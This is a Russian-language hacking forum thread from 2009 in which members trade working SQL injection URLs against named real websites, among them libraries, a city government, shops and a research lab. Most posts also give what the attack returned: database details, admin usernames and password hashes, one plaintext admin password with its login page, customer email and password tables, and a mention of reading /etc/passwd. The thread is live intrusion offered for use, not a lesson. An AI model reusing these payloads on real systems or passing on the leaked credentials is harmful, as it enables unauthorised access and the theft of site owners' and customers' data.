SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    540
    Likes Received:
    412
    Reputations:
    256
    PR - 5

    Code:
    http://www.mountain-riders.org/_news/news.php?id=-1+union+select+1,2,3,concat_ ws(0x3a,version(),database( ),user()),5,6,7,8,9--
    Database Version : 4.0.25-standard-log
    Database name : mountainriders
    User name : mountainriders@10.0.63.118


    не даёт она себя больше проскулить :mad:
     
  2. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    112
    Likes Received:
    97
    Reputations:
    21
    uaflibrary.us - PR6
    Code:
    http://uaflibrary.us/onlinedatabases/ui/resource.php?id=276276%27+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
    DB_Ver:5.0.27-max-log
    DB_User:rasmusonlib@localhost
    DB:uafresources
    5 ветка, просмотрев таблицы видим что есть еще WordPress в бд wp_rasmusondbs и табличка USERS в uafresources
    зайти в вордпресс можно тут:
    Code:
    http://uaflibrary.us/blogs/highered/hec/wp-login.php
    А вот к чему относится USERS не нашел(плохо искал наверное) =)
    Вытаскиваем админа блога
    Code:
    http://uaflibrary.us/onlinedatabases/ui/resource.php?id=276276'+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,user_login,user_pass),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+FROM+wp_rasmusondbs.wp_users/*
    admin:b29971a4ef9bd14d770bae9eefd5318d
     
  3. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    518
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://www.metropolis.ur.ru/dop.php?id=-1+union+select+concat_ws(0x3a,login,password),2,3,4+from+mtr_admin+--+
    логин/пасс:
    Code:
    metro:370df69f54fc2368
    --------------------------------------------------------
    The End!
     
    1 person likes this.
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,594
    Likes Received:
    1,242
    Reputations:
    273
    http://www.mormota.ro/index.php?tart=101&alm=4&produs=1498+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20&cont=pscout



    Database Version: 5.0.68-log
    Database name: mormota
    User name: mYmor@localhost
     
    2 people like this.
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    Code:
    http://www.santillana.com.gt/grupo/qs.php/?id=-14+union+select+1,version(),3/*
    4.1.25-Debian_mt1-log

    PR: 4
     
    _________________________
    2 people like this.
  6. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    266
    Likes Received:
    150
    Reputations:
    28
    http://www.dnkcity.dp.ua/contest/viev.php?id=82+UNION+SELECT+1,2,3,4,concat(user(),0x3a,version()),6,7,8,9,10,11,12+LIMIT+1,1/*

    есть PHPBB

    Database Version: 5.0.45-log
    Database name: dnkcityd_dnkcity
    User name: dnkcityd@localhost
     
  7. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    177
    Likes Received:
    102
    Reputations:
    23
    Как вы думаете какой лучший спозоб защиты от взлома???
    Code:
    http://mzagzog.org/index.php?pg=say.php&pag=-1%20union%20select%201,concat_ws(0x3a,user_name,pass)%20from%20admin--
    
    Сайт взломан
    elassal:lookat9095 (логин пароль)
    Админка
    http://mzagzog.org/admin/
    Логин и пароль подходят к админке... (А зайдите туды и скажите все таки какой способ защиты лучший))
     
    1 person likes this.
  8. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,917
    Likes Received:
    755
    Reputations:
    198
    Короче всё кидаю в КВОТС, чтоб не сортировать:
    С правами:
    ЗЫ vitalik:96656904e7aa6bf36b726ad9b93f13c6a81636ed
    43 символа, что за хэш, я таких невстречал ?
     
    _________________________
    #7828 b3, 18 Feb 2009
    Last edited: 18 Feb 2009
    2 people like this.
  9. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Game Happy - Счастливые игры :)

    Code:
    gamehappy.ru/games/logic'+or+ascii(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1))%3E'1/
     
    1 person likes this.
  10. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    736
    Likes Received:
    404
    Reputations:
    134
    обед
    Version:4.0.16
    Dbname:wabash
    User: root@localhost
    Вперёёёдд, дефейсеры и другие дебилы...


    зы: я потом логи просмотрю и выложу в болталке ;-)
     
    2 people like this.
  11. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    188
    Likes Received:
    162
    Reputations:
    25
    PageRank = 7


    Database Version: 5.0.7-beta-standard
    Database name: flescher
    User name: root@hermes.mbl.edu


    root : 475bf8887babd6b6


    Читаем /etc/passwd

     
    2 people like this.
  12. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    112
    Likes Received:
    97
    Reputations:
    21
    ci.bartlesville.ok.us - PR1 =\
    Code:
    http://www.ci.bartlesville.ok.us/page.php?page=-1183+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
    DB_Ver: 4.0.27-max-log
    DB_User: pendergraphics@68.178.254.114
    DB: pendergraphics
    Дальше поверхностно глянул ничего интересного =((
     
    1 person likes this.
  13. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    188
    Likes Received:
    162
    Reputations:
    25
    Database Version: 5.0.27
    Database name: dvaction
    User name: ro@localhost
     
  14. molotovkeyt

    molotovkeyt Member

    Joined:
    2 Nov 2008
    Messages:
    21
    Likes Received:
    8
    Reputations:
    -1
    Замечательная студия невероятного дизайна )):
    http://www.avestudio.ru/?pg=7&id=49&iDsub=48
    Практически все сайты с дырявым мускулем. Дерзайте.
     
    1 person likes this.
  15. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    188
    Likes Received:
    162
    Reputations:
    25
    PageRank = 6

    4.1.22
    studyskills@localhost
    howtostudy


    Шопы -) PR = 4


    Database Version: 5.0.32-Debian_7etch8-log
    Database name: aromatics
    User name: aromatics@localhost

    Администраторы:

    user_ID : user_name : pass_word

    : 1 : corey : 3d01fb21c5a7b2995b4c0bc263d90784
    : 3 : andrea : 478884f1d0e0c32d0a9a0f1a32ab1acb
    : 5 : maria : a5647dd8e76d815833a0d25d29f74747
    : 6 : alexander : c68763c0c7204310ef465cfd4d034441





    4.1.22-log
    vshields@localhost
    webb_design
     
    #7835 spherics, 18 Feb 2009
    Last edited: 18 Feb 2009
    1 person likes this.
  16. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    518
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://www.f1links.com/list.php?id=36+union+select+1,2,user,4,pass,6,7,8,9,10,11,12,13,14+from+users--
     
    1 person likes this.
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,594
    Likes Received:
    1,242
    Reputations:
    273
    www.tamasHYI.ro

    http://www.tamashyi.ro/arte_martiale.php?ID=3+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),Database(),User()),0x71),0x71),4



    Database Version: 5.0.51a-community
    Database name: tamashyi_tamashy
    User name: tamashyi_tamashy@localhost
     
    1 person likes this.
  18. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    188
    Likes Received:
    162
    Reputations:
    25
    PageRank = 6

    4.0.27-standard
    wmsem28_wmsem28@localhost
    wmsem28_onlinestore



    4.0.13-log
    lawAdmin@localhost
    cipp
     
  19. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    112
    Likes Received:
    97
    Reputations:
    21
    icgadget.ca
    Code:
    http://www.icgadget.ca/shop.php?Cat_ID=19&SubCat_ID=-28+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4/*
    DB_Ver:4.1.22-standard-log
    DB:icgadget_icgadget
    DB_User:icgadget_icgadge@localhost
    Табличка с пользователями customers поля в ней:
    email
    password
    пример запроса:
    Code:
    http://www.icgadget.ca/shop.php?Cat_ID=19&SubCat_ID=-28+UNION+SELECT+1,2,concat_ws(0x3a,email,password),4+from+customers+limit+0,1/*
    пароли ничем не шифрованны =)
     
    #7839 Kraneg, 18 Feb 2009
    Last edited: 18 Feb 2009
    1 person likes this.
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,594
    Likes Received:
    1,242
    Reputations:
    273
    http://www.pet-world.ro/h_produs.php?kid=113&pid=-111+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6--




    Database Version: 5.0.32-Debian_7etch1~bpo.1-log
    Database name: resocom_petworld
    User name: resocom_petworld@supremecenter49.com
     
    2 people like this.
Loading...
Thread Status:
Not open for further replies.